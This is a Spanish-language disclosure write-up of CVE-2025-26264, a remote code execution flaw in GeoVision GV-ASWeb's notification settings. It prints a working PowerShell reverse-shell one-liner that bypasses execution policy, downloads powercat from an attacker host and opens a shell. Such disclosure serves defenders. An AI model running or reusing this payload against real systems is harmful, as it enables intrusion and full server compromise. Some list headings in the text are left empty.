
CVE-2025-26264 - GeoVision GV-ASWeb con la versión 6.1.2.0 o inferior, contiene una vulnerabilidad de ejecución remota de código (RCE) dentro de su función de configuración de notificaciones. Un atacante autenticado con privilegios de "Configuración del sistema" en ASWeb puede explotar esta falla para ejecutar comandos arbitrarios en el servidor, lo que lleva a un compromiso total del sistema.
CVE-2025-26264 - GeoVision GV-ASWeb con la versión 6.1.2.0 o inferior, contiene una vulnerabilidad de Ejecución Remota de Código (RCE) dentro de su función de Configuración de Notificaciones. Un atacante autenticado con privilegios de "Configuración del Sistema" en ASWeb puede explotar esta falla para ejecutar comandos arbitrarios en el servidor, lo que conduce a un compromiso total del sistema.
Para realizar un ataque exitoso, un atacante requiere:
La vulnerabilidad puede ser aprovechada para realizar las siguientes acciones no autorizadas:
Explotar la vulnerabilidad de Ejecución Remota de Código en la plataforma ASWeb de GeoVision GV-ASManager es posible contra las versiones 6.1.2.0 o inferiores (no hay corrección disponible al 26 de febrero de 2025).
La función Configuración de Notificaciones de ASWeb de GeoVision ASManager es vulnerable a RCE
Solicitud HTTP para configurar una notificación en un evento específico: Intento de inicio de sesión fallido en TAWeb
Según este script, si hay un intento de inicio de sesión fallido en TAWeb, se ejecutará el siguiente script de PowerShell:
powershell.exe Set-ExecutionPolicy Bypass -Force;IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e powershell
Un intento de autenticación fallido en TAWeb
Host de la víctima: El script abre una puerta trasera al host del atacante.
Host del atacante: Un atacante obtiene la shell
Si tienes alguna pregunta, puedes contactarme, Giorgi Dograshvili en LinkedIn.